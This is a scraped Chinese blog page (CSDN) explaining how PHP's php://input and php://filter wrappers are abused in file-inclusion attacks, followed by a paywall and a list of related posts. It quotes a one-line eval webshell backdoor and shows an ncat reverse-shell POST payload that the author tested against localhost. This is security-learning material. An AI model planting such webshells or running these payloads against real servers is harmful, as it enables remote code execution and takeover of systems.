php input 漏洞,php://input，php://filter，data URI schema的那些事

最新推荐文章于 2024-07-06 12:41:50 发布

网易浪潮工作室

最新推荐文章于 2024-07-06 12:41:50 发布

阅读量1.7k

点赞数

文章标签： php input 漏洞

本文详细探讨了PHP输入漏洞，包括php://input用于接收POST数据实现一句话木马，如何将文件包含漏洞转化为代码执行漏洞，以及data URI schema在绕过WAF中的应用。同时，还介绍了php://filter在文件包含漏洞中的利用，用于读取PHP文件源码。

摘要由CSDN通过智能技术生成

一、php://input一句话木马

在调研dedecms的历史漏洞时，发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)

@eval(file_get_contents('php://input'))

我是个十足的php菜鸟，只有用到的时候才会去查查语法书，对php://input也只是有点印象而已，于是用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能。

$data=file_get_contents('php://input');

echo $data."
";

//@eval(file_get_contents('php://input'))

发现php://input是用来接收post数据(这里有php://input的介绍)

注释掉phpinput.php的打印语句

使用firefox的hackbar提交上图显示的post data：

system('ncat -e /bin/bash localhost 1234');

测试了一下nc反弹shell的利用，成功

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

网易浪潮工作室

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

无法在web.xml或使用此应用程序部署的jar文件中解析绝对uri：[http://www.springframework.org/security/tags]

changtan20000的博客

02-04

6360

无法在web.xml或使用此应用程序部署的jar文件中解析绝对uri：[http://www.springframework.org/security/tags] 已经添加 spring-security-taglibs yil tomcat 版本 9.0.22 spring 版本 5.0.15 spring security 版本 5.0.13 JDK8 pom.xml <?xml ver...

php输入流php://input使用浅析

01-21

在做一个摄像头拍照然后上传的功能，php中使用php://input来获取内容。于是就了解了下php://input。从官网信息来看，php://input是一个只读信息流，当请求方式是post的，并且enctype不等于”multipart/form-data”时，可以使用php://input来获取原始请求的数据。看一个简单的例子。客户端就是一个表单，非常简单。复制代码代码如下: <form action=”” method=”POST”> name: <input type=”text” name=”name” value=”tom” /><br> age:

参与评论您还未登录，请先登录后发表或查看评论

fileclude（文件包含漏洞及php://input、php://filter的使用）

Welcome To Myon'Blog !

04-16

4657

fileclude、文件包含漏洞、php://input、php://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议

ctfshow-web入门-文件包含（web87）巧用 php://filter 流绕过死亡函数的三种方法

最新发布

Welcome To Myon'Blog !

07-06

1180

但是我们传入的一句话木马也是 XML 标签，如何让它只去除而不破坏我们传入的木马呢？我们可以先对一句话木马进行 base64 编码后传入，这样就不会受到strip_tags 函数的影响，当去除掉后，由于 php://filter 允许使用多个过滤器，我们再调用 base64-decode 将一句话木马进行 base64 解码，实现还原。

php文件包含漏洞（input与filter）

a173262565的博客

03-06

1248

php://input php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言，它给内存带来的压力较小，并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。 php://filter协议协议语法： php://filter:/<action>=...

bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过

YouthBelief的博客

03-07

3071

bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页及源码发现一个页面访问 1.2 访问1p.html 自动跳转到主页直接查看源码得到JS代码其中申明 words变量和OutWord()方法将 escape解码后的words变量写入页面中。 words 变量经过 url编码

iwebsec靶场文件包含漏洞-php://input伪协议及利用

qq_56041380的博客

04-05

689

php://input可以访问请求的原始数据的只读流，即可以直接读取POST上没有经过解析的原始数据，但是使用enctype="multipart/form-data"的时候php://input是无效的。

PHP安全配置范例

qq_41679358的博客

07-09

1322

文章目录php安全配置范例Configurationbcmathcgi-fcgiCorectypecurldatedomeregfilterftpgdgettexthashiconvjsonlibxmlmbstringmcryptmhashmysqlmysqlimysqlndopensslpcntlpcrePDOpdo_mysqlpdo_sqlitePharposixReflectionsessionshmopSimpleXMLsoapsocketsSPLsqlite3standardtokenizerxm

渗透测试：代码注入漏洞的三三两两

WEL测试

12-01

864

什么是远程文件包含漏洞程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，而无需再次编写，这种调用文件的过程一般被称为包含。在通过PHP的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，导致意外的文件泄露甚至恶意的代码注入。如果PHP的配置选项allow_url_include为ON的话，则include/require函数是可以加载远程文件的，这种漏洞被称为远程文件包含漏洞。PHP常见的导致文件包含的函数如下： include()

Error: Cannot find module ‘umi‘ 问题处理

热门推荐

LDR1109的博客

04-23

1万+

最近接触ant design，再上手的时候，老是会碰到，找不到某某模块的问题，上网搜了一下，发现很多都不能解决问题。后来，发现可以通过 yarn add 模块名的方式，处理这种Error, 如: yarn add umi 记录一下，希望也可以帮到您！ NangongYi@LAPTOP-AKD59FEP MINGW64 /d/web/html/ant/myapp $ yarn add umi yarn add v1.22.10 info No lockfile found. [1/4] .

php://filter(文件包含漏洞利用)及php://input

Sea_Sand息禅

11-17

5854

1. php://filter 文件包含漏洞：https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用： 1、字符串过滤器： string.rot13 对字符串执行ROT13转换 string.toupper转换为大写 string.tolower 转换为小写 string.strip_tags去除...

php伪协议语法,php文件包含漏洞（input与filter）

weixin_39881167的博客

03-10

1660

php://inputphp://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言，它给内存带来的压力较小，并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。php://filter协议协议语法：php://filter:/=php://filter 的参数列表read 　　　　 ...

php://filter(文件包含漏洞利用)及php://input（转载）

知足且坚定，温柔且上进

02-08

1251

php://filter 文件包含漏洞：https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用： 1、字符串过滤器： ·string.rot13 对字符串执行ROT13转换 ·string.toupper转换为大写 ·string.tolower 转换为小写 ·string.strip_tags去除html和p...

文件包含漏洞(2), 伪协议, php://filter, php://input

探测???

10-25

287

文件包含php代码后, 会自动被web引擎解释执行, 如果想查看源码而不是执行, 则可以使用这个协议.功能: phar用于对压缩文件的读取, 配合文件上传漏洞, 或phar反序列化漏洞.的源码, 并用base64编码显示. 通过base64解码即可得到php代码.php.ini配置文件中 allow_url_fopen=On 是开启状态.与phar功能相同, 但是不能读取包含多级目录的压缩包.参数用户可控, 且没有对包含的文件进行过滤和限制.通过该phar可以直接访问zip内的txt文件.

bugku（php://input）

a3320315的博客

08-13

297

<?php if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'no no no no no no no'; return ; } $data = @file_get...

input date提交数据php,php://input & $_POST & $HTTP_RAW_POST_DATA 的详解

weixin_39751391的博客

03-22

180

PHP 用于开发 webservice 的 API 接口与客户端做数据交互时不一定会使用 PHP 可以处理的数据格式进行通信，比如 API 常用的 json xml，在此场景下我们需要使用其他的方式获取客户端发来的数据然后进行处理，下面我们就实例模拟下客户端请求 PHP API 场景下的数据交互方式。同时要理解 get 请求并未携带表单数据，get 请求的本质是请求服务器的某一资源，其向服务器发送...

iwebsec靶场文件包含漏洞通关笔记8-php://input伪协议利用

mooyuan的博客

09-14

634

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行，如果存在文件包含漏洞,可将php://input作为文件名传入,同时在post中注入设置想要注入的代码,php执行时就会将post的内容作为php代码执行。

谈一谈php://input和php://output

qq_14989227的博客

03-10

944

对一php://input介绍，PHP官方手册文档有一段话对它进行了很明确地概述。 php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下，最好使用 php://input 来代替 $HTTP_RAW_POST_DATA（原生的post数据），因为它不依赖于特定的 php.ini 指令,内存消耗更少“php://input allows you to read raw...

防火墙后漏洞：URI/HTTP/HTML扫描与安全威胁解析

1. URI：统一资源标识符是互联网上任何数字或物理资源的唯一地址。URI的基本结构包括协议（如http、https等）、主机名、路径、查询字符串和片段标识符。例如： - `...